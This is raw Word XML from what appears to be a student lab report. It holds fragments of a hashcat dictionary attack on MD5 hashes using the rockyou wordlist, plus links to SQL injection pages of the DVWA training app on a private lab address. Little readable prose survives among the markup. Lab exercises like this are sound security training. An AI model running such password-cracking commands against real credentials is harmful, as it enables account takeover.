      <w:tr w:rsidR="00230D57" w14:paraId="19797AE9" w14:textId="77777777" w:rsidTr="00B25987">
        <w:trPr>
          <w:trHeight w:val="1658"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9018" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49BF3EE7" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00B25987">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="57" w:line="552" w:lineRule="exact"/>
              <w:ind w:right="5225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FFF00"/>
              </w:rPr>
              <w:t>usr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>/share/wordlists</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="49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//directory</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-6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wordlists -h</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48DCF66A" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00B25987">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="218" w:lineRule="exac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FFF00"/>
              </w:rPr>
              <w:t>hashcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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-h</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FE619D2" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00B25987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  <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>hashcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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-a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0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-m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0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-o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hashoutput.txt</w:t>
            </w:r>
            <w:r>
              <w:rPr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hash.txt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>usr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>/share/wordlists/rockyou.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="646D0C84" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57"/>
    <w:p w14:paraId="003DDC4E" w14:textId="77777777" w:rsidR="00230D57" w:rsidRPr="004B0736" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="949"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="948" w:right="237" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C4C1D5B" w14:textId="77777777" w:rsidR="00230D57" w:rsidRPr="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="836"/>
          <w:tab w:val="left" w:pos="949"/>
          <w:tab w:val="left" w:pos="1711"/>
          <w:tab w:val="left" w:pos="2128"/>
          <w:tab w:val="left" w:pos="2678"/>
          <w:tab w:val="left" w:pos="3707"/>
          <w:tab w:val="left" w:pos="4151"/>
          <w:tab w:val="left" w:pos="4700"/>
          <w:tab w:val="left" w:pos="5892"/>
          <w:tab w:val="left" w:pos="6400"/>
          <w:tab w:val="left" w:pos="7017"/>
          <w:tab w:val="left" w:pos="7676"/>
          <w:tab w:val="left" w:pos="8478"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="835" w:right="111" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40F9E518" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="TableParagraph"/>
        <w:spacing w:line="256" w:lineRule="exact"/>
        <w:ind w:right="2830"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72F0C7F9" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="TableParagraph"/>
        <w:spacing w:line="256" w:lineRule="exact"/>
        <w:ind w:left="2833" w:right="2830"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EC0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="705587ED" w14:textId="77777777" w:rsidR="00230D57" w:rsidRPr="000931D2" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="TableParagraph"/>
        <w:spacing w:line="256" w:lineRule="exact"/>
        <w:ind w:left="2833" w:right="2830"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34B3F5B6" w14:textId="77777777" w:rsidR="00230D57" w:rsidRPr="000931D2" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:spacing w:before="90"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CC05BDB" w14:textId="77777777" w:rsidR="002B1ECF" w:rsidRDefault="002B1ECF"/>
    <w:sectPr w:rsidR="002B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E72"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F3BCF4D0"/>
    <w:lvl w:ilvl="0" w:tplc="80141B22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66F95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D100A4D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4582DDC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 w:tplc="07442B0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D2D84970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BBEE52BE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A2204F0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985432B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D75C95"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="198082EC"/>
    <w:lvl w:ilvl="0" w:tplc="FF82D19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C4A24A">
      <w:start w:val="11"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="948" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:i/>
        <w:iCs/>
        <w:color w:val="EC0000"/>
        <w:w w:val="100"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="7B96C894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3" w:tplc="8E1E7B8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4" w:tplc="CB005E8A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4A66886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643CE7C2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5565" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="A84A9A0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E17AAE8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B64E92"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0A28F02A"/>
    <w:lvl w:ilvl="0" w:tplc="10FE48E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64FBE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C7B2AE8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BEA626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0ECEB5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1CD8F64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21C2C6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F7B2E960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B36E08B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797895"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7084FC9E"/>
    <w:lvl w:ilvl="0" w:tplc="E7A07F14">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1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ABD8167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3986310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7F1A71E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FE5C92BA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71625B5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7ABC0B0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2076D462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35C4EC1E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630501"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2EB8A748"/>
    <w:lvl w:ilvl="0" w:tplc="1278D6B6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="835" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:i/>
        <w:iCs/>
        <w:color w:val="EC0000"/>
        <w:w w:val="100"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="A4280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06E8462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38DEF7CA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A43C073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5" w:tplc="980695A6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6" w:tplc="82EE8E7A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7" w:tplc="8264CFE2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C50CFBE8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num w:numId="1" w16cid:durableId="2076538820">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1600065564">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1794129229">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="129325372">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1315717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57"/>
    <w:rsid w:val="00230D57"/>
    <w:rsid w:val="002B1ECF"/>
    <w:rsid w:val="00612654"/>
    <w:rsid w:val="00903FC7"/>
    <w:rsid w:val="009B67ED"/>
    <w:rsid w:val="00C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6AD1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1D10A52C-A186-42C9-9834-E34C82A4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30D57"/>
    <w:pPr>
      <w:ind w:left="1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57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0D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0D5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30D57"/>
    <w:pPr>
      <w:ind w:left="107"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00230D57"/>
    <w:pPr>
      <w:ind w:left="840" w:hanging="360"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00230D5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172.16.15.128/dvwa/vulnerabilities/sqli/?id=5&amp;Submit=Subm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172.16.15.128/dvwa/vulnerabilities/sqli/?id=4&amp;Submit=Subm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172.16.15.128/dvwa/vulnerabilities/sqli/?id=3&amp;Submit=Subm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172.16.15.128/dvwa/vulnerabilities/sqli/?id=2&amp;Submit=Submi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72.16.15.128/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Subm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2709</Words>
  <Characters>15442</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>128</Lines>
  <Paragraphs>36</Paragraphs>
  <ScaleCrop>false</ScaleCrop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Harsh Vardhan Singh</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-02-14T16:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-14T17:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>